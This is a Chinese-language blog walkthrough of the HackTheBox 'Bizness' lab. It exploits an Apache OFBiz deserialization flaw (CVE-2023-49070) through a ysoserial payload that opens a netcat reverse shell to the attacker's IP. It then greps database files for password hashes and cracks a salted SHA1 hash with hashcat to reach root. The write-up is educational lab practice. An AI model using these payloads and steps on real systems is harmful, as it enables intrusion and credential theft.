Flowww's blog
htb bizness复盘
FLow
  2024-04-05   2024-04-08  

靶机信息

地址:https://app.hackthebox.com/machines/Bizness

难度:easy

IP:10.10.11.252

信息搜集

端口扫描,扫到22 80 443 40081端口,先看80端口,需要配置hosts文件

1
echo '10.10.11.252 bizness.htb' >> /etc/hosts

然后访问网页,翻到最下面发现是apache ofbiz

查询到有相关漏洞,反序列化命令执行漏洞 CVE-2023-49070,在网上找到poc,按照poc使用

先下载ysoserial.jar生成base64的payload

1
java -jar ysoserial-all.jar CommonsBeanutils1 'nc -e /bin/bash 10.10.16.19 8888' | base64 | tr -d "\n"

然后发包

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
GET /id
webtools/control/xmlrpc;/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: bizness.htb
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=42ED2921E0C9B3F3BB49F2D2D2F4030A.jvm1; JSESSIONID=21613FA6F2D87CC9AF8B6AC6A4DF1FF7.jvm1; OFBiz.Visitor=10639
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Content-Length: 4157

<?xml version="1.0"?>
<methodCall>
  <methodName>ProjectDiscovery</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">生成的paylpad</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>

成功拿到第一个shell

提权

涉及的知识点没见过,记录一下

通过搜索,找到/opt/ofbiz/runtime/data/derby/ofbiz/seg0目录下有很多.dat文件,derby是个小型数据库

1
cat * | grep -arin -o -E '(\w+\W+){0,5}password(\W+\w+){0,5}'
  • (\w+\W+){0,5}:这是一个正则表达式,用于匹配最多五个字母/数字和非字母/数字字符的序列。\w+ 匹配一个或多个字母/数字字符,\W+ 匹配一个或多个非字母/数字字符,{0,5} 表示该序列最多重复匹配 0 到 5 次。
  • password:这是正则表达式中的一个具体词汇,表示要匹配的密码。

找到一串,Password=”$SHA$d$uP0_QaVBpDWFeo8-dRzDqRwXQ2I” ,然后用cyberchef对后半段进行处理,解密成16进制的字符串

把_换成/,把-换成+,再base64解码,最后转化到十六进制

1
hashid -emj b8fd3f41a541a435857a8f3e751cc3a91c174362

使用hashid识别一下加密类型

猜测是120模式

1
hashcat -a 0 -m 120 "b8fd3f41a541a435857a8f3e751cc3a91c174362:d" Desktop/rockyou.txt --show

爆出来的密码是monkeybizness

然后直接su - root登录,权限就到root了

总结

这个靶机最后提取拿密码的思路之前没见过,学习了,然后apache那个反序列化漏洞实践poc的过程很有趣,htb的靶机质量真的可以。

涉及知识点:poc利用,sha1加盐爆破,信息搜集(敏感数据库泄露),grep正则提取。

主要参考文章

https://tryhackmyoffsecbox.github.io/Target-Machines-WriteUp/docs/HackTheBox/Machines/Bizness/

https://www.cnblogs.com/gsh23/p/18087933

  1. 1. 靶机信息
  2. 2. 信息搜集
  3. 3. 提权
  4. 4. 总结
  5. 5. 主要参考文章
© 2020 - 2024    FLow
由 Hexo 驱动 & 主题 Keep
  1. 1. 靶机信息
  2. 2. 信息搜集
  3. 3. 提权
  4. 4. 总结
  5. 5. 主要参考文章